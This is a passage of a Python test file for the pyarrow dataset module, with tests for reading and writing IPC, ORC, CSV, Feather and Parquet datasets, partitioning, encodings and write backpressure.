reader = scanner.to_reader()
reader.read_all()
def test_ipc_format(tempdir, dataset_reader):
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.arrow')
with pa.output_stream(path) as sink:
writer = pa.RecordBatchFileWriter(sink, table.schema)
writer.write_batch(table.to_batches()[0])
writer.close()
dataset = ds.dataset(path, format=ds.IpcFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
for format_str in ["ipc", "arrow"]:
dataset = ds.dataset(path, format=format_str)
result = dataset_reader.to_table(dataset)
assert result.equals(table)
@pytest.mark.orc
def test_orc_format(tempdir, dataset_reader):
from pyarrow import orc
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.orc')
orc.write_table(table, path)
dataset = ds.dataset(path, format=ds.OrcFileFormat())
fragments = list(dataset.get_fragments())
assert isinstance(fragments[0], ds.FileFragment)
result = dataset_reader.to_table(dataset)
result.validate(full=True)
assert result.equals(table)
dataset = ds.dataset(path, format="orc")
result = dataset_reader.to_table(dataset)
result.validate(full=True)
assert result.equals(table)
result = dataset_reader.to_table(dataset, columns=["b"])
result.validate(full=True)
assert result.equals(table.select(["b"]))
result = dataset_reader.to_table(
dataset, columns={"b2": ds.field("b") * 2}
)
result.validate(full=True)
assert result.equals(
pa.table({'b2': pa.array([.2, .4, .6], type="float64")})
)
assert dataset_reader.count_rows(dataset) == 3
assert dataset_reader.count_rows(dataset, filter=ds.field("a") > 2) == 1
@pytest.mark.orc
def test_orc_scan_options(tempdir, dataset_reader):
from pyarrow import orc
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.orc')
orc.write_table(table, path)
dataset = ds.dataset(path, format="orc")
result = list(dataset_reader.to_batches(dataset))
assert len(result) == 1
assert result[0].num_rows == 3
assert result[0].equals(table.to_batches()[0])
# TODO batch_size is not yet supported (ARROW-14153)
# result = list(dataset_reader.to_batches(dataset, batch_size=2))
# assert len(result) == 2
# assert result[0].num_rows == 2
# assert result[0].equals(table.slice(0, 2).to_batches()[0])
# assert result[1].num_rows == 1
# assert result[1].equals(table.slice(2, 1).to_batches()[0])
def test_orc_format_not_supported():
try:
from pyarrow.dataset import OrcFileFormat # noqa
except ImportError:
# ORC is not available, test error message
with pytest.raises(
ValueError, match="not built with support for the ORC file"
):
ds.dataset(".", format="orc")
@pytest.mark.pandas
def test_csv_format(tempdir, dataset_reader):
table = pa.table({'a': pa.array([1, 2, 3], type="int64"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.csv')
table.to_pandas().to_csv(path, index=False)
dataset = ds.dataset(path, format=ds.CsvFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
dataset = ds.dataset(path, format='csv')
result = dataset_reader.to_table(dataset)
assert result.equals(table)
@pytest.mark.pandas
@pytest.mark.parametrize("compression", [
"bz2",
"gzip",
"lz4",
"zstd",
])
def test_csv_format_compressed(tempdir, compression, dataset_reader):
if not pyarrow.Codec.is_available(compression):
pytest.skip("{} support is not built".format(compression))
table = pa.table({'a': pa.array([1, 2, 3], type="int64"),
'b': pa.array([.1, .2, .3], type="float64")})
filesystem = fs.LocalFileSystem()
suffix = compression if compression != 'gzip' else 'gz'
path = str(tempdir / f'test.csv.{suffix}')
with filesystem.open_output_stream(path, compression=compression) as sink:
        # https://github.com/pandas-dev/pandas/issues/23854
        # With the Pandas version used on CI (anything < 1.2), to_csv tries
        # to write str to the binary sink, so encode the CSV text manually
csv_str = table.to_pandas().to_csv(index=False)
sink.write(csv_str.encode('utf-8'))
dataset = ds.dataset(path, format=ds.CsvFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
def test_csv_format_options(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'w') as sink:
sink.write('skipped\ncol0\nfoo\nbar\n')
dataset = ds.dataset(path, format='csv')
result = dataset_reader.to_table(dataset)
assert result.equals(
pa.table({'skipped': pa.array(['col0', 'foo', 'bar'])}))
dataset = ds.dataset(path, format=ds.CsvFileFormat(
read_options=pa.csv.ReadOptions(skip_rows=1)))
result = dataset_reader.to_table(dataset)
assert result.equals(pa.table({'col0': pa.array(['foo', 'bar'])}))
dataset = ds.dataset(path, format=ds.CsvFileFormat(
read_options=pa.csv.ReadOptions(column_names=['foo'])))
result = dataset_reader.to_table(dataset)
assert result.equals(
pa.table({'foo': pa.array(['skipped', 'col0', 'foo', 'bar'])}))
def test_csv_format_options_generate_columns(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'w') as sink:
sink.write('1,a,true,1\n')
dataset = ds.dataset(path, format=ds.CsvFileFormat(
read_options=pa.csv.ReadOptions(autogenerate_column_names=True)))
result = dataset_reader.to_table(dataset)
expected_column_names = ["f0", "f1", "f2", "f3"]
assert result.column_names == expected_column_names
assert result.equals(pa.table({'f0': pa.array([1]),
'f1': pa.array(["a"]),
'f2': pa.array([True]),
'f3': pa.array([1])}))
def test_csv_fragment_options(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'w') as sink:
sink.write('col0\nfoo\nspam\nMYNULL\n')
dataset = ds.dataset(path, format='csv')
convert_options = pyarrow.csv.ConvertOptions(null_values=['MYNULL'],
strings_can_be_null=True)
options = ds.CsvFragmentScanOptions(
convert_options=convert_options,
read_options=pa.csv.ReadOptions(block_size=2**16))
result = dataset_reader.to_table(dataset, fragment_scan_options=options)
assert result.equals(pa.table({'col0': pa.array(['foo', 'spam', None])}))
csv_format = ds.CsvFileFormat(convert_options=convert_options)
dataset = ds.dataset(path, format=csv_format)
result = dataset_reader.to_table(dataset)
assert result.equals(pa.table({'col0': pa.array(['foo', 'spam', None])}))
options = ds.CsvFragmentScanOptions()
result = dataset_reader.to_table(dataset, fragment_scan_options=options)
assert result.equals(
pa.table({'col0': pa.array(['foo', 'spam', 'MYNULL'])}))
def test_encoding(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
for encoding, input_rows in [
('latin-1', b"a,b\nun,\xe9l\xe9phant"),
('utf16', b'\xff\xfea\x00,\x00b\x00\n\x00u\x00n\x00,'
b'\x00\xe9\x00l\x00\xe9\x00p\x00h\x00a\x00n\x00t\x00'),
]:
with open(path, 'wb') as sink:
sink.write(input_rows)
# Interpret as utf8:
expected_schema = pa.schema([("a", pa.string()), ("b", pa.string())])
expected_table = pa.table({'a': ["un"],
'b': ["éléphant"]}, schema=expected_schema)
read_options = pa.csv.ReadOptions(encoding=encoding)
file_format = ds.CsvFileFormat(read_options=read_options)
dataset_transcoded = ds.dataset(path, format=file_format)
assert dataset_transcoded.schema.equals(expected_schema)
assert dataset_transcoded.to_table().equals(expected_table)
# Test that a dataset with non-UTF-8 characters in the column names is handled properly
def test_column_names_encoding(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'wb') as sink:
sink.write(b"\xe9,b\nun,\xe9l\xe9phant")
# Interpret as utf8:
expected_schema = pa.schema([("é", pa.string()), ("b", pa.string())])
expected_table = pa.table({'é': ["un"],
'b': ["éléphant"]}, schema=expected_schema)
# Reading as string without specifying encoding should produce an error
dataset = ds.dataset(path, format='csv', schema=expected_schema)
with pytest.raises(pyarrow.lib.ArrowInvalid, match="invalid UTF8"):
dataset_reader.to_table(dataset)
# Setting the encoding in the read_options should transcode the data
read_options = pa.csv.ReadOptions(encoding='latin-1')
file_format = ds.CsvFileFormat(read_options=read_options)
dataset_transcoded = ds.dataset(path, format=file_format)
assert dataset_transcoded.schema.equals(expected_schema)
assert dataset_transcoded.to_table().equals(expected_table)
def test_feather_format(tempdir, dataset_reader):
from pyarrow.feather import write_feather
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
basedir = tempdir / "feather_dataset"
basedir.mkdir()
write_feather(table, str(basedir / "data.feather"))
dataset = ds.dataset(basedir, format=ds.IpcFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
dataset = ds.dataset(basedir, format="feather")
result = dataset_reader.to_table(dataset)
assert result.equals(table)
# ARROW-8641 - column selection order
result = dataset_reader.to_table(dataset, columns=["b", "a"])
assert result.column_names == ["b", "a"]
result = dataset_reader.to_table(dataset, columns=["a", "a"])
assert result.column_names == ["a", "a"]
# error with Feather v1 files
write_feather(table, str(basedir / "data1.feather"), version=1)
with pytest.raises(ValueError):
dataset_reader.to_table(ds.dataset(basedir, format="feather"))
def _create_parquet_dataset_simple(root_path):
"""
Creates a simple (flat files, no nested partitioning) Parquet dataset
"""
metadata_collector = []
for i in range(4):
table = pa.table({'f1': [i] * 10, 'f2': np.random.randn(10)})
pq.write_to_dataset(
table, str(root_path), metadata_collector=metadata_collector
)
metadata_path = str(root_path / '_metadata')
# write _metadata file
pq.write_metadata(
table.schema, metadata_path,
metadata_collector=metadata_collector
)
return metadata_path, table
@pytest.mark.parquet
@pytest.mark.pandas # write_to_dataset currently requires pandas
def test_parquet_dataset_factory(tempdir):
root_path = tempdir / "test_parquet_dataset"
metadata_path, table = _create_parquet_dataset_simple(root_path)
dataset = ds.parquet_dataset(metadata_path)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 4
result = dataset.to_table()
assert result.num_rows == 40
@pytest.mark.parquet
@pytest.mark.pandas # write_to_dataset currently requires pandas
@pytest.mark.skipif(sys.platform == 'win32',
reason="Results in FileNotFoundError on Windows")
def test_parquet_dataset_factory_fsspec(tempdir):
# https://issues.apache.org/jira/browse/ARROW-16413
fsspec = pytest.importorskip("fsspec")
# create dataset with pyarrow
root_path = tempdir / "test_parquet_dataset"
metadata_path, table = _create_parquet_dataset_simple(root_path)
# read using fsspec filesystem
fsspec_fs = fsspec.filesystem("file")
# manually creating a PyFileSystem, because passing the local fsspec
# filesystem would internally be converted to native LocalFileSystem
filesystem = fs.PyFileSystem(fs.FSSpecHandler(fsspec_fs))
dataset = ds.parquet_dataset(metadata_path, filesystem=filesystem)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 4
result = dataset.to_table()
assert result.num_rows == 40
@pytest.mark.parquet
@pytest.mark.pandas # write_to_dataset currently requires pandas
@pytest.mark.parametrize('use_legacy_dataset', [False, True])
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_parquet_dataset_factory_roundtrip(tempdir, use_legacy_dataset):
# Simple test to ensure we can roundtrip dataset to
# _metadata/common_metadata and back. A more complex test
# using partitioning will have to wait for ARROW-13269. The
# above test (test_parquet_dataset_factory) will not work
# when legacy is False as there is no "append" equivalent in
# the new dataset until ARROW-12358
root_path = tempdir / "test_parquet_dataset"
table = pa.table({'f1': [0] * 10, 'f2': np.random.randn(10)})
metadata_collector = []
pq.write_to_dataset(
table, str(root_path), metadata_collector=metadata_collector,
use_legacy_dataset=use_legacy_dataset
)
metadata_path = str(root_path / '_metadata')
# write _metadata file
pq.write_metadata(
table.schema, metadata_path,
metadata_collector=metadata_collector
)
dataset = ds.parquet_dataset(metadata_path)
assert dataset.schema.equals(table.schema)
result = dataset.to_table()
assert result.num_rows == 10
@pytest.mark.parquet
def test_parquet_dataset_factory_order(tempdir):
# The order of the fragments in the dataset should match the order of the
# row groups in the _metadata file.
metadatas = []
# Create a dataset where f1 is incrementing from 0 to 100 spread across
# 10 files. Put the row groups in the correct order in _metadata
for i in range(10):
table = pa.table(
{'f1': list(range(i*10, (i+1)*10))})
table_path = tempdir / f'{i}.parquet'
pq.write_table(table, table_path, metadata_collector=metadatas)
metadatas[-1].set_file_path(f'{i}.parquet')
metadata_path = str(tempdir / '_metadata')
pq.write_metadata(table.schema, metadata_path, metadatas)
dataset = ds.parquet_dataset(metadata_path)
# Ensure the table contains values from 0-100 in the right order
scanned_table = dataset.to_table()
scanned_col = scanned_table.column('f1').to_pylist()
assert scanned_col == list(range(0, 100))
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_factory_invalid(tempdir):
root_path = tempdir / "test_parquet_dataset_invalid"
metadata_path, table = _create_parquet_dataset_simple(root_path)
# remove one of the files
list(root_path.glob("*.parquet"))[0].unlink()
dataset = ds.parquet_dataset(metadata_path)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 4
with pytest.raises(FileNotFoundError):
dataset.to_table()
def _create_metadata_file(root_path):
# create _metadata file from existing parquet dataset
parquet_paths = list(sorted(root_path.rglob("*.parquet")))
schema = pq.ParquetFile(parquet_paths[0]).schema.to_arrow_schema()
metadata_collector = []
for path in parquet_paths:
metadata = pq.ParquetFile(path).metadata
metadata.set_file_path(str(path.relative_to(root_path)))
metadata_collector.append(metadata)
metadata_path = root_path / "_metadata"
pq.write_metadata(
schema, metadata_path, metadata_collector=metadata_collector
)
return metadata_path
def _create_parquet_dataset_partitioned(root_path):
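    # Write a parquet dataset hive-partitioned on 'part' and create a
    # _metadata summary file; returns (metadata_path, table)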
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
table = table.replace_schema_metadata({"key": "value"})
pq.write_to_dataset(table, str(root_path), partition_cols=['part'])
return _create_metadata_file(root_path), table
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_factory_partitioned(tempdir):
root_path = tempdir / "test_parquet_dataset_factory_partitioned"
metadata_path, table = _create_parquet_dataset_partitioned(root_path)
partitioning = ds.partitioning(flavor="hive")
dataset = ds.parquet_dataset(metadata_path, partitioning=partitioning)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 2
result = dataset.to_table()
assert result.num_rows == 20
# the partitioned dataset does not preserve order
result = result.to_pandas().sort_values("f1").reset_index(drop=True)
expected = table.to_pandas()
pd.testing.assert_frame_equal(result, expected)
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_factory_metadata(tempdir):
# ensure ParquetDatasetFactory preserves metadata (ARROW-9363)
root_path = tempdir / "test_parquet_dataset_factory_metadata"
metadata_path, table = _create_parquet_dataset_partitioned(root_path)
dataset = ds.parquet_dataset(metadata_path, partitioning="hive")
assert dataset.schema.equals(table.schema)
assert b"key" in dataset.schema.metadata
fragments = list(dataset.get_fragments())
assert b"key" in fragments[0].physical_schema.metadata
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_lazy_filtering(tempdir, open_logging_fs):
fs, assert_opens = open_logging_fs
# Test to ensure that no IO happens when filtering a dataset
# created with ParquetDatasetFactory from a _metadata file
root_path = tempdir / "test_parquet_dataset_lazy_filtering"
metadata_path, _ = _create_parquet_dataset_simple(root_path)
# creating the dataset should only open the metadata file
with assert_opens([metadata_path]):
dataset = ds.parquet_dataset(
metadata_path,
partitioning=ds.partitioning(flavor="hive"),
filesystem=fs)
# materializing fragments should not open any file
with assert_opens([]):
fragments = list(dataset.get_fragments())
# filtering fragments should not open any file
with assert_opens([]):
list(dataset.get_fragments(ds.field("f1") > 15))
# splitting by row group should still not open any file
with assert_opens([]):
fragments[0].split_by_row_group(ds.field("f1") > 15)
# ensuring metadata of split fragment should also not open any file
with assert_opens([]):
rg_fragments = fragments[0].split_by_row_group()
rg_fragments[0].ensure_complete_metadata()
    # Actually scanning does open files, but the check below is disabled:
    # FIXME(bkietz) on Windows it results in FileNotFoundErrors.
# with assert_opens([f.path for f in fragments]):
# dataset.to_table()
@pytest.mark.parquet
@pytest.mark.pandas
def test_dataset_schema_metadata(tempdir, dataset_reader):
# ARROW-8802
df = pd.DataFrame({'a': [1, 2, 3]})
path = tempdir / "test.parquet"
df.to_parquet(path)
dataset = ds.dataset(path)
schema = dataset_reader.to_table(dataset).schema
projected_schema = dataset_reader.to_table(dataset, columns=["a"]).schema
# ensure the pandas metadata is included in the schema
assert b"pandas" in schema.metadata
# ensure it is still there in a projected schema (with column selection)
assert schema.equals(projected_schema, check_metadata=True)
@pytest.mark.parquet
def test_filter_mismatching_schema(tempdir, dataset_reader):
# ARROW-9146
table = pa.table({"col": pa.array([1, 2, 3, 4], type='int32')})
pq.write_table(table, str(tempdir / "data.parquet"))
# specifying explicit schema, but that mismatches the schema of the data
schema = pa.schema([("col", pa.int64())])
dataset = ds.dataset(
tempdir / "data.parquet", format="parquet", schema=schema)
    # filtering on a column with such a type mismatch should implicitly
    # cast the column
filtered = dataset_reader.to_table(dataset, filter=ds.field("col") > 2)
assert filtered["col"].equals(table["col"].cast('int64').slice(2))
fragment = list(dataset.get_fragments())[0]
filtered = dataset_reader.to_table(
fragment, filter=ds.field("col") > 2, schema=schema)
assert filtered["col"].equals(table["col"].cast('int64').slice(2))
@pytest.mark.parquet
@pytest.mark.pandas
def test_dataset_project_only_partition_columns(tempdir, dataset_reader):
# ARROW-8729
table = pa.table({'part': 'a a b b'.split(), 'col': list(range(4))})
path = str(tempdir / 'test_dataset')
pq.write_to_dataset(table, path, partition_cols=['part'])
dataset = ds.dataset(path, partitioning='hive')
all_cols = dataset_reader.to_table(dataset)
part_only = dataset_reader.to_table(dataset, columns=['part'])
assert all_cols.column('part').equals(part_only.column('part'))
@pytest.mark.parquet
@pytest.mark.pandas
def test_dataset_project_null_column(tempdir, dataset_reader):
import pandas as pd
df = pd.DataFrame({"col": np.array([None, None, None], dtype='object')})
f = tempdir / "test_dataset_project_null_column.parquet"
df.to_parquet(f, engine="pyarrow")
dataset = ds.dataset(f, format="parquet",
schema=pa.schema([("col", pa.int64())]))
expected = pa.table({'col': pa.array([None, None, None], pa.int64())})
assert dataset_reader.to_table(dataset).equals(expected)
def test_dataset_project_columns(tempdir, dataset_reader):
# basic column re-projection with expressions
from pyarrow import feather
table = pa.table({"A": [1, 2, 3], "B": [1., 2., 3.], "C": ["a", "b", "c"]})
feather.write_feather(table, tempdir / "data.feather")
dataset = ds.dataset(tempdir / "data.feather", format="feather")
result = dataset_reader.to_table(dataset, columns={
'A_renamed': ds.field('A'),
'B_as_int': ds.field('B').cast("int32", safe=False),
'C_is_a': ds.field('C') == 'a'
})
expected = pa.table({
"A_renamed": [1, 2, 3],
"B_as_int": pa.array([1, 2, 3], type="int32"),
"C_is_a": [True, False, False],
})
assert result.equals(expected)
# raise proper error when not passing an expression
with pytest.raises(TypeError, match="Expected an Expression"):
dataset_reader.to_table(dataset, columns={"A": "A"})
@pytest.mark.pandas
@pytest.mark.parquet
def test_dataset_preserved_partitioning(tempdir):
# ARROW-8655
# through discovery, but without partitioning
_, path = _create_single_file(tempdir)
dataset = ds.dataset(path)
assert dataset.partitioning is None
    # through discovery, data is hive-partitioned but partitioning not specified
full_table, path = _create_partitioned_dataset(tempdir)
dataset = ds.dataset(path)
assert dataset.partitioning is None
# through discovery, with hive partitioning (from a partitioning factory)
dataset = ds.dataset(path, partitioning="hive")
part = dataset.partitioning
assert part is not None
assert isinstance(part, ds.HivePartitioning)
assert part.schema == pa.schema([("part", pa.int32())])
assert len(part.dictionaries) == 1
assert part.dictionaries[0] == pa.array([0, 1, 2], pa.int32())
# through discovery, with hive partitioning (from a partitioning object)
part = ds.partitioning(pa.schema([("part", pa.int32())]), flavor="hive")
assert isinstance(part, ds.HivePartitioning) # not a factory
assert len(part.dictionaries) == 1
assert all(x is None for x in part.dictionaries)
dataset = ds.dataset(path, partitioning=part)
part = dataset.partitioning
assert isinstance(part, ds.HivePartitioning)
assert part.schema == pa.schema([("part", pa.int32())])
# TODO is this expected?
assert len(part.dictionaries) == 1
assert all(x is None for x in part.dictionaries)
# through manual creation -> not available
dataset = ds.dataset(path, partitioning="hive")
dataset2 = ds.FileSystemDataset(
list(dataset.get_fragments()), schema=dataset.schema,
format=dataset.format, filesystem=dataset.filesystem
)
assert dataset2.partitioning is None
# through discovery with ParquetDatasetFactory
root_path = tempdir / "data-partitioned-metadata"
metadata_path, _ = _create_parquet_dataset_partitioned(root_path)
dataset = ds.parquet_dataset(metadata_path, partitioning="hive")
part = dataset.partitioning
assert part is not None
assert isinstance(part, ds.HivePartitioning)
assert part.schema == pa.schema([("part", pa.string())])
assert len(part.dictionaries) == 1
# will be fixed by ARROW-13153 (order is not preserved at the moment)
# assert part.dictionaries[0] == pa.array(["a", "b"], pa.string())
assert set(part.dictionaries[0].to_pylist()) == {"a", "b"}
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_to_dataset_given_null_just_works(tempdir):
schema = pa.schema([
pa.field('col', pa.int64()),
pa.field('part', pa.dictionary(pa.int32(), pa.string()))
])
table = pa.table({'part': [None, None, 'a', 'a'],
'col': list(range(4))}, schema=schema)
path = str(tempdir / 'test_dataset')
pq.write_to_dataset(table, path, partition_cols=[
'part'], use_legacy_dataset=False)
actual_table = pq.read_table(tempdir / 'test_dataset')
# column.equals can handle the difference in chunking but not the fact
# that `part` will have different dictionaries for the two chunks
assert actual_table.column('part').to_pylist(
) == table.column('part').to_pylist()
assert actual_table.column('col').equals(table.column('col'))
@pytest.mark.parquet
@pytest.mark.pandas
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_legacy_write_to_dataset_drops_null(tempdir):
schema = pa.schema([
pa.field('col', pa.int64()),
pa.field('part', pa.dictionary(pa.int32(), pa.string()))
])
table = pa.table({'part': ['a', 'a', None, None],
'col': list(range(4))}, schema=schema)
expected = pa.table(
{'part': ['a', 'a'], 'col': list(range(2))}, schema=schema)
path = str(tempdir / 'test_dataset')
pq.write_to_dataset(table, path, partition_cols=[
'part'], use_legacy_dataset=True)
actual = pq.read_table(tempdir / 'test_dataset')
assert actual == expected
def _sort_table(tab, sort_col):
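    # Return `tab` sorted ascending on `sort_col`, so tables whose row order
    # is not deterministic can be compared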
import pyarrow.compute as pc
sorted_indices = pc.sort_indices(
tab, options=pc.SortOptions([(sort_col, 'ascending')]))
return pc.take(tab, sorted_indices)
def _check_dataset_roundtrip(dataset, base_dir, expected_files, sort_col,
base_dir_path=None, partitioning=None):
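    # Write `dataset` to `base_dir` as arrow/ipc files, check that exactly the
    # expected files were created, and verify the data round-trips (ignoring
    # row order)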
base_dir_path = base_dir_path or base_dir
ds.write_dataset(dataset, base_dir, format="arrow",
partitioning=partitioning, use_threads=False)
# check that all files are present
file_paths = list(base_dir_path.rglob("*"))
assert set(file_paths) == set(expected_files)
# check that reading back in as dataset gives the same result
dataset2 = ds.dataset(
base_dir_path, format="arrow", partitioning=partitioning)
assert _sort_table(dataset2.to_table(), sort_col).equals(
_sort_table(dataset.to_table(), sort_col))
@pytest.mark.parquet
def test_write_dataset(tempdir):
# manually create a written dataset and read as dataset object
directory = tempdir / 'single-file'
directory.mkdir()
_ = _create_single_file(directory)
dataset = ds.dataset(directory)
# full string path
target = tempdir / 'single-file-target'
expected_files = [target / "part-0.arrow"]
_check_dataset_roundtrip(dataset, str(target), expected_files, 'a', target)
# pathlib path object
target = tempdir / 'single-file-target2'
expected_files = [target / "part-0.arrow"]
_check_dataset_roundtrip(dataset, target, expected_files, 'a', target)
# TODO
# # relative path
# target = tempdir / 'single-file-target3'
# expected_files = [target / "part-0.ipc"]
# _check_dataset_roundtrip(
# dataset, './single-file-target3', expected_files, target)
# Directory of files
directory = tempdir / 'single-directory'
directory.mkdir()
_ = _create_directory_of_files(directory)
dataset = ds.dataset(directory)
target = tempdir / 'single-directory-target'
expected_files = [target / "part-0.arrow"]
_check_dataset_roundtrip(dataset, str(target), expected_files, 'a', target)
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_partitioned(tempdir):
directory = tempdir / "partitioned"
_ = _create_parquet_dataset_partitioned(directory)
partitioning = ds.partitioning(flavor="hive")
dataset = ds.dataset(directory, partitioning=partitioning)
# hive partitioning
target = tempdir / 'partitioned-hive-target'
expected_paths = [
target / "part=a", target / "part=a" / "part-0.arrow",
target / "part=b", target / "part=b" / "part-0.arrow"
]
partitioning_schema = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
_check_dataset_roundtrip(
dataset, str(target), expected_paths, 'f1', target,
partitioning=partitioning_schema)
# directory partitioning
target = tempdir / 'partitioned-dir-target'
expected_paths = [
target / "a", target / "a" / "part-0.arrow",
target / "b", target / "b" / "part-0.arrow"
]
partitioning_schema = ds.partitioning(
pa.schema([("part", pa.string())]))
_check_dataset_roundtrip(
dataset, str(target), expected_paths, 'f1', target,
partitioning=partitioning_schema)
def test_write_dataset_with_field_names(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"])
load_back = ds.dataset(tempdir, format='ipc', partitioning=["b"])
files = load_back.files
partitioning_dirs = {
str(pathlib.Path(f).relative_to(tempdir).parent) for f in files
}
assert partitioning_dirs == {"x", "y", "z"}
load_back_table = load_back.to_table()
assert load_back_table.equals(table)
def test_write_dataset_with_field_names_hive(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"], partitioning_flavor="hive")
load_back = ds.dataset(tempdir, format='ipc', partitioning="hive")
files = load_back.files
partitioning_dirs = {
str(pathlib.Path(f).relative_to(tempdir).parent) for f in files
}
assert partitioning_dirs == {"b=x", "b=y", "b=z"}
load_back_table = load_back.to_table()
assert load_back_table.equals(table)
def test_write_dataset_with_scanner(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z'],
'c': [1, 2, 3]})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"])
dataset = ds.dataset(tempdir, format='ipc', partitioning=["b"])
with tempfile.TemporaryDirectory() as tempdir2:
ds.write_dataset(dataset.scanner(columns=["b", "c"]),
tempdir2, format='ipc', partitioning=["b"])
load_back = ds.dataset(tempdir2, format='ipc', partitioning=["b"])
load_back_table = load_back.to_table()
assert dict(load_back_table.to_pydict()
) == table.drop(["a"]).to_pydict()
@pytest.mark.parquet
def test_write_dataset_with_backpressure(tempdir):
consumer_gate = threading.Event()
# A filesystem that blocks all writes so that we can build
# up backpressure. The writes are released at the end of
# the test.
class GatingFs(ProxyHandler):
def open_output_stream(self, path, metadata):
# Block until the end of the test
consumer_gate.wait()
return self._fs.open_output_stream(path, metadata=metadata)
gating_fs = fs.PyFileSystem(GatingFs(fs.LocalFileSystem()))
schema = pa.schema([pa.field('data', pa.int32())])
# The scanner should queue ~ 8Mi rows (~8 batches) but due to ARROW-16258
# it always queues 32 batches.
batch = pa.record_batch([pa.array(list(range(1_000_000)))], schema=schema)
batches_read = 0
min_backpressure = 32
end = 200
keep_going = True
def counting_generator():
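        # Yield the same batch repeatedly while counting how many batches have
        # been consumed, so the test can detect when backpressure pauses the
        # scanner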
nonlocal batches_read
while batches_read < end:
if not keep_going:
return
time.sleep(0.01)
batches_read += 1
yield batch
scanner = ds.Scanner.from_batches(
counting_generator(), schema=schema, use_threads=True)
write_thread = threading.Thread(
target=lambda: ds.write_dataset(
scanner, str(tempdir), format='parquet', filesystem=gating_fs))
write_thread.start()
try:
start = time.time()
def duration():
return time.time() - start
# This test is timing dependent. There is no signal from the C++
# when backpressure has been hit. We don't know exactly when
# backpressure will be hit because it may take some time for the
# signal to get from the sink to the scanner.
#
# The test may emit false positives on slow systems. It could
# theoretically emit a false negative if the scanner managed to read
# and emit all 200 batches before the backpressure signal had a chance
# to propagate but the 0.01s delay in the generator should make that
# scenario unlikely.
last_value = 0
backpressure_probably_hit = False
while duration() < 10:
if batches_read > min_backpressure:
if batches_read == last_value:
backpressure_probably_hit = True
break
last_value = batches_read
time.sleep(0.5)
assert backpressure_probably_hit
finally:
# If any batches remain to be generated go ahead and
# skip them
keep_going = False
consumer_gate.set()
write_thread.join()
def test_write_dataset_with_dataset(tempdir):
table = pa.table({'b': ['x', 'y', 'z'], 'c': [1, 2, 3]})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"])
dataset = ds.dataset(tempdir, format='ipc', partitioning=["b"])
with tempfile.TemporaryDirectory() as tempdir2:
ds.write_dataset(dataset, tempdir2,
format='ipc', partitioning=["b"])
load_back = ds.dataset(tempdir2, format='ipc', partitioning=["b"])
load_back_table = load_back.to_table()
assert dict(load_back_table.to_pydict()) == table.to_pydict()
@pytest.mark.pandas
def test_write_dataset_existing_data(tempdir):
directory = tempdir / 'ds'
table = pa.table({'b': ['x', 'y', 'z'], 'c': [1, 2, 3]})
partitioning = ds.partitioning(schema=pa.schema(
[pa.field('c', pa.int64())]), flavor='hive')
def compare_tables_ignoring_order(t1, t2):
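        # Row order is not preserved by partitioned reads, so sort on 'b'
        # before comparing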
df1 = t1.to_pandas().sort_values('b').reset_index(drop=True)
df2 = t2.to_pandas().sort_values('b').reset_index(drop=True)
assert df1.equals(df2)
# First write is ok
ds.write_dataset(table, directory, partitioning=partitioning, format='ipc')
table = pa.table({'b': ['a', 'b', 'c'], 'c': [2, 3, 4]})
# Second write should fail
with pytest.raises(pa.ArrowInvalid):
ds.write_dataset(table, directory,
partitioning=partitioning, format='ipc')
extra_table = pa.table({'b': ['e']})
extra_file = directory / 'c=2' / 'foo.arrow'
pyarrow.feather.write_feather(extra_table, extra_file)
    # Should succeed and overwrite existing data with 'overwrite_or_ignore'
ds.write_dataset(table, directory, partitioning=partitioning,
format='ipc',
existing_data_behavior='overwrite_or_ignore')
overwritten = pa.table(
{'b': ['e', 'x', 'a', 'b', 'c'], 'c': [2, 1, 2, 3, 4]})
readback = ds.dataset(tempdir, format='ipc',
partitioning=partitioning).to_table()
compare_tables_ignoring_order(readback, overwritten)
assert extra_file.exists()
    # Should succeed and delete matching partition data with 'delete_matching'
ds.write_dataset(table, directory, partitioning=partitioning,
format='ipc', existing_data_behavior='delete_matching')
